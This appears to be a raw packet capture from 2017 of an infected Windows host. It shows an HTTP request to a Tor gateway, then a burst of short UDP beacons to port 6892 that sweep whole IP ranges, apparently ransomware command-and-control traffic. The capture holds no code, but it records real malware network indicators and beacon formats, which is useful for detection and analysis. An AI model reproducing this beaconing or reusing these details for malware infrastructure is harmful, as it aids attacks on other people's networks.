User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

2017-01-15 23:26:41.145409 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [P.], seq 416:885, ack 4922, win 258, length 469
E…].@……..f.`&@…………P…BA………..`F.T.. ..6.09l….Z’…*.y*+..wu..2E….Ih…<..:.; ]…#..X.]~_iC……cq…..J;9.w:.\.jU.wh..a…{.O=!pK.L*.U.k…nH..40|.+3…..>…0.+.1.H.[r…`
….wY.`.\x..<sg'[……….j.@q..]………%. …j……_)2na..-.g..p…j…].Q..0Lc….U..’p`’..Y…..u.?.4….f<…..y..wn..p….2..p`f2..’;dT.h…..R9..;…9…,.[Nz.”.d..Js\$.>s..s….QR.d….j.7pE9.b…4….a.s./.O..$…gq:d..+zE…{~I…8.mZ=.|..U.?O….%.IP.*.^…[…..  ……..W…..N.@?VW.`.}0.Q….
2017-01-15 23:26:41.182203 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 7842, win 258, length 0
E..(].@….X…f.`&@………..LP…b………
2017-01-15 23:26:41.183483 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 10762, win 258, length 0
E..(].@….W…f.`&@…………P…W?……..
2017-01-15 23:26:41.184075 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 12335, win 258, length 0
E..(].@….V…f.`&@…………P…Q………
2017-01-15 23:26:41.184772 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [P.], seq 885:970, ack 12335, win 258, length 85
E..}].@……..f.`&@…………P…O…….PU…,.m..U.E.;.y….A=………8@..w…..3Gg…f…..s\..~…c.H.qn4n..i.VQ.n.:4
2017-01-15 23:26:41.184840 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [F.], seq 970, ack 12335, win 258, length 0
E..(].@….T…f.`&@…………P…P………
2017-01-15 23:26:41.205735 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 12336, win 258, length 0
E..(].@….S…f.`&@…………P…P………
2017-01-15 23:26:49.285306 IP 192.168.1.102.57428 > 15.49.2.0.6892: UDP, length 10
E..&Xb…..&…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285682 IP 192.168.1.102.57428 > 15.49.2.1.6892: UDP, length 10
E..&……P….f.1…T……hi005c9027……..
2017-01-15 23:26:49.285739 IP 192.168.1.102.57428 > 15.49.2.2.6892: UDP, length 10
E..&………..f.1…T……hi005c9027……..
2017-01-15 23:26:49.285790 IP 192.168.1.102.57428 > 15.49.2.3.6892: UDP, length 10
E..&0
….8{…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285840 IP 192.168.1.102.57428 > 15.49.2.4.6892: UDP, length 10
E..&……\….f.1…T……hi005c9027……..
2017-01-15 23:26:49.285890 IP 192.168.1.102.57428 > 15.49.2.5.6892: UDP, length 10
E..&D:….$I…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285940 IP 192.168.1.102.57428 > 15.49.2.6.6892: UDP, length 10
E..&,V….<,…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285942 IP 192.168.1.102.57428 > 15.49.2.7.6892: UDP, length 10
E..&c……….f.1…T……hi005c9027……..
2017-01-15 23:26:49.286028 IP 192.168.1.102.57428 > 15.49.2.8.6892: UDP, length 10
E..&1…..6….f.1…T……hi005c9027……..
2017-01-15 23:26:49.286078 IP 192.168.1.102.57428 > 15.49.2.9.6892: UDP, length 10
E..&~5…..I…f.1.     .T……hi005c9027……..
2017-01-15 23:26:49.286080 IP 192.168.1.102.57428 > 15.49.2.10.6892: UDP, length 10
E..&.S….R+…f.1.
.T……hi005c9027……..

2017-01-15 23:26:49.287148 IP 192.168.1.102.57428 > 122.1.13.0.6892: UDP, length 10
E..&}…..u….fz….T……hi005c9027……..
2017-01-15 23:26:49.287150 IP 192.168.1.102.57428 > 122.1.13.1.6892: UDP, length 10
E..&2……
…fz….T……hi005c9027……..
2017-01-15 23:26:49.287198 IP 192.168.1.102.57428 > 122.1.13.2.6892: UDP, length 10
E..&Z……….fz….T……hi005c9027……..
2017-01-15 23:26:49.287286 IP 192.168.1.102.57428 > 122.1.13.3.6892: UDP, length 10
E..&.z…..:…fz….T……hi005c9027……..
2017-01-15 23:26:49.287336 IP 192.168.1.102.57428 > 122.1.13.4.6892: UDP, length 10
E..&/……….fz….T……hi005c9027……..
2017-01-15 23:26:49.287386 IP 192.168.1.102.57428 > 122.1.13.5.6892: UDP, length 10
E..&aJ…..h…fz….T……hi005c9027……..
2017-01-15 23:26:49.287388 IP 192.168.1.102.57428 > 122.1.13.6.6892: UDP, length 10
E..&    &………fz….T……hi005c9027……..
2017-01-15 23:26:49.287472 IP 192.168.1.102.57428 > 122.1.13.7.6892: UDP, length 10
E..&F……….fz….T……hi005c9027……..
2017-01-15 23:26:49.287522 IP 192.168.1.102.57428 > 122.1.13.8.6892: UDP, length 10
E..&………..fz….T……hi005c9027……..
2017-01-15 23:26:49.287572 IP 192.168.1.102.57428 > 122.1.13.9.6892: UDP, length 10
E..&[e…..I…fz..     .T……hi005c9027……..
2017-01-15 23:26:49.287574 IP 192.168.1.102.57428 > 122.1.13.10.6892: UDP, length 10
E..&3C…..j…fz.
.T……hi005c9027……..
2017-01-15 23:26:49.287657 IP 192.168.1.102.57428 > 122.1.13.11.6892: UDP, length 10
E..&|…..v!…fz….T…..
hi005c9027……..

2017-01-15 23:26:49.288685 IP 192.168.1.102.57428 > 194.165.16.1.6892: UDP, length 10
E..&uK….1….f…..T….6phi005c9027……..
2017-01-15 23:26:49.288734 IP 192.168.1.102.57428 > 194.165.16.2.6892: UDP, length 10
E..&.1………f…..T….6ohi005c9027……..
2017-01-15 23:26:49.288737 IP 192.168.1.102.57428 > 194.165.16.3.6892: UDP, length 10
E..&R…..Tw…f…..T….6nhi005c9027……..
2017-01-15 23:26:49.288786 IP 192.168.1.102.57428 > 194.165.16.4.6892: UDP, length 10
E..&i!….=….f…..T….6mhi005c9027……..
2017-01-15 23:26:49.288866 IP 192.168.1.102.57428 > 194.165.16.5.6892: UDP, length 10
E..&&……e…f…..T….6lhi005c9027……..
2017-01-15 23:26:49.288916 IP 192.168.1.102.57428 > 194.165.16.6.6892: UDP, length 10
E..&N…..XF…f…..T….6khi005c9027……..
2017-01-15 23:26:49.288919 IP 192.168.1.102.57428 > 194.165.16.7.6892: UDP, length 10
E..&………..f…..T….6jhi005c9027……..
2017-01-15 23:26:49.288966 IP 192.168.1.102.57428 > 194.165.16.8.6892: UDP, length 10
E..&S…..S….f…..T….6ihi005c9027……..
2017-01-15 23:26:49.289051 IP 192.168.1.102.57428 > 194.165.16.9.6892: UDP, length 10
E..&…….D…f…     .T….6hhi005c9027……..
2017-01-15 23:26:49.289100 IP 192.168.1.102.57428 > 194.165.16.10.6892: UDP, length 10
E..&t…..2’…f…
.T….6ghi005c9027……..

2017-01-15 23:26:52.735146 IP 192.168.1.102.57429 > 194.165.17.244.6892: UDP, length 24
E..4Si….Q….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735196 IP 192.168.1.102.57429 > 194.165.17.245.6892: UDP, length 24
E..4…….O…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735198 IP 192.168.1.102.57429 > 194.165.17.246.6892: UDP, length 24
E..4l…..8p…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735279 IP 192.168.1.102.57429 > 194.165.17.247.6892: UDP, length 24
E..4+…..z….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735329 IP 192.168.1.102.57429 > 194.165.17.248.6892: UDP, length 24
E..4yd….+….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735379 IP 192.168.1.102.57429 > 194.165.17.249.6892: UDP, length 24
E..4>…..f>…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735381 IP 192.168.1.102.57429 > 194.165.17.250.6892: UDP, length 24
E..4V…..Na…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746310 IP 192.168.1.102.57429 > 194.165.17.251.6892: UDP, length 24
E..4!……….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746315 IP 192.168.1.102.57429 > 194.165.17.252.6892: UDP, length 24
E..4*~….z….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746317 IP 192.168.1.102.57429 > 194.165.17.253.6892: UDP, length 24
E..4m8….7….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746320 IP 192.168.1.102.57429 > 194.165.17.254.6892: UDP, length 24
E..4.\………f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:53.725719 IP 192.168.1.102.57429 > 194.165.17.255.6892: UDP, length 24
E..4R…..R …f…..U… ..8870f233185a005c950110f5